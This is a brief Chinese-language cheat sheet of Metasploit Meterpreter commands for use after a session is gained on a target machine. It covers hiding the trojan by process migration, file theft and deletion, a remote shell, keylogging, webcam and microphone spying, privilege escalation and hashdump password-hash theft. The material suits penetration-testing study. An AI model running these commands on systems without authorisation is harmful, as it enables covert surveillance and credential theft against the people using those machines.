獲得一個session會話後，可進行的命令操作

session操作

Msf下 sessions –l 列出目前msf後臺已有的session
Sessions –i 1 使用id=1的seesion，並進入meterpeter
Meterpreter下 background查看當前後臺存在的session

以下命令皆在 meterpreter下執行

進程相關功能:
Ps查看進程
比如木馬進程1234 靶機桌面進程exploit.exe是3445
Ps 3445 就可以把木馬進程注入到桌面進程，可對木馬進程做隱藏
migrate 7240 meterpreter shell的pid調到7240裏相對穩定應用的進程裏
Run vnc 查看靶機的桌面，不過不能點擊

文件管理功能：
upload 上傳文件
download 下載文件
mkdir 創建文件
edit 編輯文件
mv 移動文件
cat 查看文件內容

rm -f 刪除文件
rm -rf 刪除文件夾
-r 就是向下遞歸，不管有多少級目錄，一併刪除
-f 就是直接強行刪除，不作任何提示的意思

網絡及系統操作:
arp 查看arp緩存表(IP地址和MAC地址的對照關係)
ifconfig/ipconfig 查看ip地址網卡
netstat 查看端口連接

kill 結束進程 kill 432
ps 查看進程
reg 修改註冊表
reboot 重啓電腦
shell 獲取shell
shutdown 關閉電腦
sysinfo 獲取電腦信息

用戶操作和其他功能 Enumdesktops 窗體列表（用戶登錄數） keyscan_dump 鍵盤記錄-下載 keyscan_start 鍵盤記錄-開始 keyscan_stop 鍵盤記錄-停止 uictl 獲取鍵盤鼠標的控制權uictl disable keyboard鎖定鍵盤 record_mic 錄製音頻 webcam_chat 查看目標的攝像頭 webcam_list 攝像頭列表 webcam_stream 攝像頭監控 getsystem 獲取高權限 hashdump 下載hash密文